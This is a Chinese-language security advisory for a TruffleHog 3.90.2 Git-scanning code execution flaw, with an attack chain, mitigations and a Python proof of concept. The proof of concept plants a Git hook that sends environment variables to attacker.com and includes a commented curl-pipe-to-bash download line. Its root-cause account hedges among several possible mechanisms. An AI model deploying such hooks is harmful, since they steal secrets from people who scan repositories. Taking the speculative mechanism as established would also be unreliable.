CVE-2025-41390：TruffleHog Git功能任意代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-41390

漏洞类型

任意代码执行

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Truffle Security TruffleHog

漏洞概述

CVE-2025-41390是Truffle Security公司开发的TruffleHog工具3.90.2版本中存在的一个高危任意代码执行漏洞。TruffleHog是一款广泛使用的开源秘密扫描工具，用于在代码仓库、文件系统等数据源中检测泄露的凭证、API密钥和其他敏感信息。该漏洞存在于TruffleHog的Git功能模块中，当工具处理特制的恶意Git仓库时，攻击者可以通过精心构造的仓库内容触发任意代码执行。

该漏洞由Cisco Talos安全团队发现并报告（编号TALOS-2025-2243），披露日期为2025年10月20日。CVSS 3.1评分为7.8分，属于高危级别。攻击向量为本地攻击（AV:L），无需特殊权限（PR:N），但需要用户交互（UI:R），意味着受害者需要主动使用TruffleHog扫描攻击者提供的恶意仓库才能触发漏洞。该漏洞对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H），一旦被利用，攻击者可以在受害者的系统上执行任意代码，可能导致数据泄露、系统入侵、凭证窃取等严重后果。由于TruffleHog常用于安全审计和DevOps流程中，该漏洞对安全团队和开发团队构成较大威胁。

技术细节

该漏洞存在于TruffleHog 3.90.2版本的Git扫描功能中。当TruffleHog对Git仓库进行秘密扫描时，会执行Git操作来读取仓库内容。漏洞的根本原因在于TruffleHog在处理Git仓库时未能充分验证和过滤仓库中的元数据或配置信息，导致攻击者可以通过构造特殊的Git仓库（如利用Git钩子、submodule引用、符号链接或恶意.git目录内容）来执行任意代码。

具体利用方式如下：攻击者创建一个包含恶意配置的Git仓库，例如配置恶意的Git hooks（如post-checkout、pre-commit等），或者利用Git的submodule功能指向恶意URL。当安全研究人员或开发人员使用TruffleHog扫描该恶意仓库时，TruffleHog的Git功能模块会执行相应的Git操作，触发恶意钩子或加载恶意submodule，从而在用户系统上执行攻击者预设的任意代码。

由于漏洞触发需要用户交互（UI:R），攻击者需要诱导受害者主动扫描恶意仓库。常见的社会工程场景包括：在开源项目中提交包含恶意配置的PR、在公开代码托管平台上发布看似正常的项目、或者通过钓鱼邮件附件形式发送恶意仓库。由于TruffleHog通常在CI/CD流水线或安全扫描任务中自动运行，一旦恶意仓库被纳入扫描范围，漏洞将自动触发，无需人工干预即可造成危害。

攻击链分析

STEP 1

步骤1：创建恶意Git仓库

攻击者创建一个包含恶意Git钩子（如post-checkout）或恶意submodule配置的Git仓库，钩子中包含任意代码执行载荷

STEP 2

步骤2：投递恶意仓库

攻击者通过开源项目PR、公开代码托管平台或钓鱼邮件等方式，将恶意仓库投递给目标用户或组织

STEP 3

步骤3：诱导用户扫描

受害者使用TruffleHog 3.90.2扫描该恶意仓库，可能是手动扫描或在CI/CD流水线中自动扫描

STEP 4

步骤4：触发漏洞

TruffleHog执行Git操作时触发恶意钩子或加载恶意配置，导致任意代码在受害者系统上执行

STEP 5

步骤5：代码执行与危害

攻击者预设的恶意代码被执行，可窃取凭证、植入后门、横向移动或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-41390 PoC - TruffleHog Git RCE # Create a malicious Git repository that triggers arbitrary code execution # when scanned by TruffleHog 3.90.2 import os import subprocess def create_malicious_repo(): """Create a Git repository with malicious hooks to exploit CVE-2025-41390""" repo_path = "./malicious_repo" os.makedirs(repo_path, exist_ok=True) os.chdir(repo_path) # Initialize git repository subprocess.run(["git", "init"], check=True) # Create a malicious post-checkout hook hooks_dir = ".git/hooks" os.makedirs(hooks_dir, exist_ok=True) # Malicious payload - executes arbitrary code when triggered payload = '''#!/bin/bash # Malicious payload - arbitrary code execution # This hook executes when TruffleHog scans the repository echo "[+] CVE-2025-41390 triggered - Arbitrary code execution" # Example: exfiltrate environment variables env | curl -X POST -d @- http://attacker.com/exfil 2>/dev/null # Example: download and execute additional payload # curl http://attacker.com/payload.sh | bash ''' hook_path = os.path.join(hooks_dir, "post-checkout") with open(hook_path, "w") as f: f.write(payload) os.chmod(hook_path, 0o755) # Create a dummy file to commit with open("README.md", "w") as f: f.write("# Legitimate looking repository\n") # Configure git and commit subprocess.run(["git", "config", "user.email", "[email protected]"], check=True) subprocess.run(["git", "config", "user.name", "Attacker"], check=True) subprocess.run(["git", "add", "."], check=True) subprocess.run(["git", "commit", "-m", "Initial commit"], check=True) print(f"[+] Malicious repository created at: {repo_path}") print("[+] When scanned by TruffleHog 3.90.2, it will execute the payload") if __name__ == "__main__": create_malicious_repo() # Usage: # 1. Run this script to create the malicious repo # 2. Host the repo or send it to the victim # 3. When victim runs: trufflehog git file://./malicious_repo # 4. The post-checkout hook executes arbitrary code on the victim's system

影响范围

TruffleHog < 3.90.3

TruffleHog 3.90.2

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在隔离的沙箱环境或容器中运行TruffleHog，限制其对主机系统的访问权限；2）在运行TruffleHog前，先使用git clone --no-local等选项避免触发本地钩子，或手动检查仓库的.git/hooks目录；3）仅扫描来自可信来源的Git仓库，避免扫描未知来源的仓库；4）使用最小权限用户运行TruffleHog扫描任务，限制潜在危害；5）监控TruffleHog运行时的网络活动和进程行为，及时发现异常。